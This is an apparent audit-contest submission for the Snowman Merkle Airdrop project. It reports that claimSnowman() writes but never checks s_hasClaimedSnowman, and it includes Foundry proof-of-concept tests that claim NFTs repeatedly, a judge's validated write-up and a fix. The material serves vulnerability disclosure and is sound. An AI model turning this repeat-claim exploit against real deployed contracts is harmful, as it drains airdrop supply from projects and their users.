Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: low

Valid

Missing `s_hasClaimedSnowman` check allows users to claim airdrop NFTs infinitely by re-acquiring Snow tokens <br />

ashfiexe

Description:

The SnowmanAirdrop contract is designed to allow a user to claim Snowman NFTs exactly once by staking their Snow tokens, verifying a Merkle proof, and providing a valid signature.

The s_hasClaimedSnowman mapping is set to true after a claim but is never checked at the beginning of the claimSnowman() function, allowing users who re-acquire Snow tokens to claim NFTs repeatedly using the same Merkle proof and a new valid signature.

function claimSnowman(address receiver, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s)

external

nonReentrant

{

@> // Missing check: if (s_hasClaimedSnowman[receiver]) revert();

if (receiver == address(0)) {

revert SA__ZeroAddress();

}

if (i_snow.balanceOf(receiver) == 0) {

revert SA__ZeroAmount();

}

// ... signature and proof verification pass again ...

s_hasClaimedSnowman[receiver] = true; @> // Written but never read for gating

}

Risk:

Likelihood:

Every user who claims will naturally claim again when their Snow balance returns to the Merkle leaf amount, as the system allows it without restriction.

Free Snow tokens can be earned weekly via earnSnow(), making it trivial and costless to re-acquire the exact balance needed to reuse the same Merkle proof.

Impact:

Users can claim far more NFTs than intended, completely draining the NFT supply and diluting the value of all Snowman NFTs.

The airdrop distribution is fundamentally broken and unfair, as early claimers can infinitely extract value.

Proof of Concept:

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

import {Test, console2} from "forge-std/Test.sol";

import {Snow} from "../src/Snow.sol";

import {Snowman} from "../src/Snowman.sol";

import {SnowmanAirdrop} from "../src/SnowmanAirdrop.sol";

import {MockWETH} from "../src/mock/MockWETH.sol";

import {Helper} from "../script/Helper.s.sol";

contract PoC2_InfiniteClaims is Test {

Snow snow; Snowman nft; SnowmanAirdrop airdrop; MockWETH weth; Helper deployer;

bytes32 alProofA = 0xf99782cec890699d4947528f9884acaca174602bb028a66d0870534acf241c52;

bytes32 alProofB = 0xbc5a8a0aad4a65155abf53bb707aa6d66b11b220ecb672f7832c05613dba82af;

bytes32 alProofC = 0x971653456742d62534a5d7594745c292dda6a75c69c43a6a6249523f26e0cac1;

bytes32[] AL_PROOF = [alProofA, alProofB, alProofC];

address alice; uint256 alKey; address satoshi;

function setUp() public {

deployer = new Helper(); (airdrop, snow, nft, weth) = deployer.run();

(alice, alKey) = makeAddrAndKey("alice"); satoshi = makeAddr("gas_payer");

}

function testAliceCanClaimMultipleTimes() public {

// 1st Claim

vm.prank(alice); snow.approve(address(airdrop), 1);

bytes32 alDigest = airdrop.getMessageHash(alice);

(uint8 alV, bytes32 alR, bytes32 alS) = vm.sign(alKey, alDigest);

vm.prank(satoshi); airdrop.claimSnowman(alice, AL_PROOF, alV, alR, alS);

assertEq(nft.balanceOf(alice), 1);

// Re-earn Snow (balance returns to 1, matching the Merkle leaf)

vm.warp(block.timestamp + 1 weeks);

vm.prank(alice); snow.earnSnow();

vm.prank(alice); snow.approve(address(airdrop), 1);

// 2nd Claim with SAME Merkle proof

bytes32 alDigest2 = airdrop.getMessageHash(alice);

(uint8 alV2, bytes32 alR2, bytes32 alS2) = vm.sign(alKey, alDigest2);

vm.prank(satoshi); airdrop.claimSnowman(alice, AL_PROOF, alV2, alR2, alS2);

assertEq(nft.balanceOf(alice), 2);

// Re-earn again

vm.warp(block.timestamp + 1 weeks);

vm.prank(alice); snow.earnSnow();

vm.prank(alice); snow.approve(address(airdrop), 1);

// 3rd Claim

bytes32 alDigest3 = airdrop.getMessageHash(alice);

(uint8 alV3, bytes32 alR3, bytes32 alS3) = vm.sign(alKey, alDigest3);

vm.prank(satoshi); airdrop.claimSnowman(alice, AL_PROOF, alV3, alR3, alS3);

assertEq(nft.balanceOf(alice), 3);

}

Recommended Mitigation:

Here is the fix:

function claimSnowman(address receiver, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s)

external

nonReentrant

{

+ if (s_hasClaimedSnowman[receiver]) {

+ revert SA__AlreadyClaimed();

+ }

if (receiver == address(0)) {

revert SA__ZeroAddress();

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[L-01] Missing Claim Status Check Allows Multiple Claims in SnowmanAirdrop.sol::claimSnowman

# Root + Impact   **Root:** The [`claimSnowman`](https://github.com/CodeHawks-Contests/2025-06-snowman-merkle-airdrop/blob/b63f391444e69240f176a14a577c78cb85e4cf71/src/SnowmanAirdrop.sol#L44) function updates `s_hasClaimedSnowman[receiver] = true` but never checks if the user has already claimed before processing the claim, allowing users to claim multiple times if they acquire more Snow tokens. **Impact:** Users can bypass the intended one-time airdrop limit by claiming, acquiring more Snow tokens, and claiming again, breaking the airdrop distribution model and allowing unlimited NFT minting for eligible users. ## Description * **Normal Behavior:** Airdrop mechanisms should enforce one claim per eligible user to ensure fair distribution and prevent abuse of the reward system. * **Specific Issue:** The function sets the claim status to true after processing but never validates if `s_hasClaimedSnowman[receiver]` is already true at the beginning, allowing users to claim multiple times as long as they have Snow tokens and valid proofs. ## Risk **Likelihood**: Medium * Users need to acquire additional Snow tokens between claims, which requires time and effort * Users must maintain their merkle proof validity across multiple claims * Attack requires understanding of the missing validation check **Impact**: High * **Airdrop Abuse**: Users can claim far more NFTs than intended by the distribution mechanism * **Unfair Distribution**: Some users receive multiple rewards while others may receive none * **Economic Manipulation**: Breaks the intended scarcity and distribution model of the NFT collection ## Proof of Concept Add the following test to TestSnowMan.t.sol ```Solidity function testMultipleClaimsAllowed() public { // Alice claims her first NFT vm.prank(alice); snow.approve(address(airdrop), 1); bytes32 aliceDigest = airdrop.getMessageHash(alice); (uint8 v, bytes32 r, bytes32 s) = vm.sign(alKey, aliceDigest); vm.prank(alice); airdrop.claimSnowman(alice, AL_PROOF, v, r, s); assert(nft.balanceOf(alice) == 1); assert(airdrop.getClaimStatus(alice) == true); // Alice acquires more Snow tokens (wait for timer and earn again) vm.warp(block.timestamp + 1 weeks); vm.prank(alice); snow.earnSnow(); // Alice can claim AGAIN with new Snow tokens! vm.prank(alice); snow.approve(address(airdrop), 1); bytes32 aliceDigest2 = airdrop.getMessageHash(alice); (uint8 v2, bytes32 r2, bytes32 s2) = vm.sign(alKey, aliceDigest2); vm.prank(alice); airdrop.claimSnowman(alice, AL_PROOF, v2, r2, s2); // Second claim succeeds! assert(nft.balanceOf(alice) == 2); // Alice now has 2 NFTs } ``` ## Recommended Mitigation **Add a claim status check at the beginning of the function** to prevent users from claiming multiple times. ```diff // Add new error + error SA__AlreadyClaimed(); function claimSnowman(address receiver, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s) external nonReentrant { + if (s_hasClaimedSnowman[receiver]) { + revert SA__AlreadyClaimed(); + } + if (receiver == address(0)) { revert SA__ZeroAddress(); } // Rest of function logic... s_hasClaimedSnowman[receiver] = true; } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!